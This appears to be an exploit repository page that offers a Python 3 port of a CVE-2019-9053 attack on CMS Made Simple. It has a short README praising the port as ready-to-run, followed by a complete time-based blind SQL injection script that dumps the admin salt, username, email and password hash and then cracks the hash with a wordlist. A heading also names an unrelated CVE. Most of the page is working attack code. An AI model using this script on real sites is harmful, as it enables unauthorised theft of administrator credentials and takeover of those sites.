Exploits Python cve-2019-9053– by HackHeart# -exploit-lab
Exploits Python cve-2019-0708 – by HackHeart
🧠 Code Review & Porting - Python 2 → Python 3
This exploit was originally written in Python 2, which is no longer supported by modern systems. To ensure compatibility and maintain future-proof tooling, the entire codebase has been carefully reviewed and migrated to Python 3.
🔧 Key improvements during the port:
Updated print statements to Python 3 syntax
Replaced raw_input() with input()
Adapted socket operations to handle byte/str properly (.decode() added)
Removed deprecated methods like xrange() and .iteritems()
Validated script compatibility with Python 3.8+ and modern Linux distros
🛡️ This version maintains the exploit logic intact while ensuring:
Compatibility with modern OSCP / Red Team labs
Cleaner, safer, and more readable syntax
Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)
#!/usr/bin/env python3
# CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection
import requests
import time
import argparse
import hashlib
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")
args = parser.parse_args()
url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
TIME = 1
flag = True
salt = ''
username = ''
email = ''
password_hash = ''
output = ""
def dump_field(field_name, table, column, condition):
global flag
result = ""
ord_result = ""
while flag:
flag = False
for char in dictionary:
temp_result = result + char
ord_temp_result = ord_result + format(ord(char), "x")
print(f"[*] Trying {temp_result}")
payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
start_time = time.time()
session.get(url_vuln + "&m1_idlist=" + payload)
if time.time() - start_time >= TIME:
result = temp_result
ord_result = ord_temp_result
flag = True
break
return result
print("[+] Extracting salt...")
flag = True
salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b")
output += f"Salt: {salt}\n"
print("[+] Extracting username...")
flag = True
username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31")
output += f"Username: {username}\n"
print("[+] Extracting email...")
flag = True
email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31")
output += f"Email: {email}\n"
print("[+] Extracting password hash...")
flag = True
password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31")
output += f"Hash: {password_hash}\n"
if args.crack and args.wordlist:
print("[+] Cracking password...")
with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
word = line.strip()
print(f"[*] Trying password: {word}")
if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
output += f"[+] Password cracked: {word}\n"
break
print("\n=== Exploit Results ===")
print(output)
[4.0K] /data/pocs/09899c31d7e3c938326af9c8d2933276160ca66c
├── [2.6K] cve_2019_9053_python3.py
└── [3.5K] README.md
0 directories, 2 files